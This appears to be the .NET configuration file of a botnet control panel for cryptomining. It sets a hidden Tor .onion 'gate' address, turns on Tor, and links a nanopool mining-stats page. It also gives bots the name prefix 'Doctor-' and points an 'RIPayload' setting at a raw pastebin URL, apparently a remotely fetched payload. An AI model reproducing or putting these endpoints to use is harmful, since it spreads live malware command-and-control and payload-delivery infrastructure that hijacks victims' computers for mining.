<?xml version="1.0" encoding="utf-8" ?>
<configuration>
    <configSections>
        <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >
            <section name="Panel.Properties.Settings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />
        </sectionGroup>
    </configSections>
    <startup> 
        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
    </startup>
    <userSettings>
        <Panel.Properties.Settings>
            <setting name="GateLocation" serializeAs="String">
                <value>https://orion34hchpyg2s5orienucaley5f5c6dmfzsdnkvf555yk7dwpibzid.onion:7019/</value>
            </setting>
            <setting name="UpdateInterval" serializeAs="String">
                <value>5</value>
            </setting>
            <setting name="MiningStats" serializeAs="String">
                <value>https://pasc.nanopool.org/stats</value>
            </setting>
            <setting name="Prefix" serializeAs="String">
                <value>Doctor-</value>
            </setting>
            <setting name="Username" serializeAs="String">
                <value />
            </setting>
            <setting name="APIKey" serializeAs="String">
                <value />
            </setting>
            <setting name="RIPayload" serializeAs="String">
                <value>https://pastebin.com/raw/xDwZLbRH</value>
            </setting>
            <setting name="Tor" serializeAs="String">
                <value>True</value>
            </setting>
        </Panel.Properties.Settings>
    </userSettings>
</configuration>